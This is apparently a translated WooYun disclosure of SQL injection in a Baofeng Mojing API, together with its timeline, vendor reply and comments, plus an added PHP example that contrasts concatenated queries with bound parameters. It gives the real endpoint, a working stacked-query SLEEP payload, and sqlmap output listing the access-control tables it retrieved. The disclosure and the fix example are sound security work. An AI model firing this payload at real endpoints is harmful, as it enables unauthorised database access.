
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0211580

Title: A Baofeng Mojing site has SQL injection / 59 tables / access-control database

Vendor: mojing.cn

Author: hear7v

Submitted: 2016-05-22 08:45

Fixed: 2016-07-07 12:00

Published: 2016-07-07 12:00

Type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-05-22: Details sent to the vendor, awaiting vendor handling
2016-05-23: Vendor confirmed; details disclosed to the vendor only
2016-06-02: Details disclosed to core white hats and domain experts
2016-06-12: Details disclosed to regular white hats
2016-06-22: Details disclosed to intern white hats
2016-07-07: Details disclosed to the public

Brief description:

I had planned to do a run of women's-site targets these days, but this hole turned up tonight instead.

Detailed description:

http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC
This should be the app's API endpoint; I captured the traffic with a packet sniffer and ran sqlmap with the UA set. Stacked-query injection. Some info:
---
Parameter: cpu_hardware_model (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#
---

Proof of vulnerability:

23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times
[01:26:57] [ERROR] invalid character detected. retrying..
[01:26:57] [WARNING] increasing time delay to 3 seconds
59
[01:27:22] [ERROR] invalid character detected. retrying..
[01:27:23] [WARNING] increasing time delay to 4 seconds
[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
acl_menu_url
[01:31:14] [INFO] retrieved: acl_permissions
[01:34:51] [INFO] retrieved: acl_resources
[01:37:40] [INFO] retrieved: acl_roles
[01:39:17] [INFO] retrieved: acl_user_to_role
[01:43:24] [INFO] retrieved: acl_users
[01:44:16] [INFO] retrieved: android_ba

Fix:

Filter the input. The vendor is so cold; could you send a gift?

Copyright notice: when reposting, credit hear7v@WooYun
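The report names the parameter (cpu_hardware_model), the technique (stacked queries) and the fix ("filter"). The following is an added example, not the vendor's code: a hypothetical PHP handler for the testing.php parameters listed in the report, first in the string-concatenating form that lets a quote-closing value append a second statement, then rewritten so user data is bound as parameters. The table name, columns and connection details are assumed; the real schema is not on the page.

```php
<?php
// Added example (hypothetical handler, not the vendor's code).
// Assumed connection and table; the page shows neither.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=cms', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepare: one statement per call
]);

// The GET parameters named in the report, read as plain strings.
$fields = ['mobile_brand', 'mobile_model', 'image_result', 'sound_result',
           'telecom_operator', 'cpu_instruction_model', 'cpu_hardware_model'];
$in = [];
foreach ($fields as $f) {
    $in[$f] = isset($_GET[$f]) ? (string) $_GET[$f] : '';
}

// VULNERABLE (hypothetical): values spliced into the SQL text. A value such as
// "...AC');(SELECT ...)#" closes the string literal and the VALUES list, and the
// appended statement runs if the driver accepts multiple statements per query.
function storeResultUnsafe(PDO $pdo, array $in): void {
    $sql = "INSERT INTO scene_video_test (mobile_brand, mobile_model, cpu_hardware_model)"
         . " VALUES ('{$in['mobile_brand']}', '{$in['mobile_model']}', '{$in['cpu_hardware_model']}')";
    $pdo->exec($sql);
}

// FIXED: the SQL text is constant; user data travels as bound parameters and is
// stored verbatim, so no quoting trick can change the statement structure.
function storeResultSafe(PDO $pdo, array $in): void {
    $stmt = $pdo->prepare(
        'INSERT INTO scene_video_test
            (mobile_brand, mobile_model, image_result, sound_result,
             telecom_operator, cpu_instruction_model, cpu_hardware_model)
         VALUES (:brand, :model, :img, :snd, :op, :instr, :hw)'
    );
    $stmt->execute([
        ':brand' => $in['mobile_brand'],
        ':model' => $in['mobile_model'],
        ':img'   => (int) $in['image_result'],   // numeric fields: cast, do not quote
        ':snd'   => (int) $in['sound_result'],
        ':op'    => (int) $in['telecom_operator'],
        ':instr' => $in['cpu_instruction_model'],
        ':hw'    => $in['cpu_hardware_model'],
    ]);
}

storeResultSafe($pdo, $in);
```

With native prepares the sqlmap probe from the report is stored as an ordinary string value; a web-side filter can additionally reject values that contain ';' or comment markers, but the binding is what closes the hole.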


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-05-23 11:54

Vendor reply:

Thank you for submitting this vulnerability; we will fix it as soon as possible.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-05-22 08:59 | sauce ( Regular white hat | Rank:300 Vulns:47 | RMB-oriented programming)

    Baofeng Sunglasses (暴风墨镜)

  2. 2016-05-22 09:05 | hear7v ( Regular white hat | Rank:175 Vulns:26 | Looking for a crew to take me in)

    @sauce I'm a man of culture.

  3. 2016-05-22 09:21 | prolog ( Regular white hat | Rank:977 Vulns:212 )

    Time to change my password again, damn

  4. 2016-05-22 10:36 | 放逐 ( Passerby | Rank:2 Vulns:1 | White hat 放逐 Gg? Gains and losses, joy and sorrow, and Av Qq205655539)

    qwq

  5. 2016-05-22 21:01 | hear7v ( Regular white hat | Rank:175 Vulns:26 | Looking for a crew to take me in)

    @prolog It's the ACL database, nothing serious

  6. 2016-05-23 16:04 | txt0t ( Passerby | Rank:8 Vulns:8 | txt0t)

    Nice, nice

  7. 2016-05-30 23:42 | hear7v ( Regular white hat | Rank:175 Vulns:26 | Looking for a crew to take me in)

    @暴风魔镜 You asked for my contact details, but it seems no gift has arrived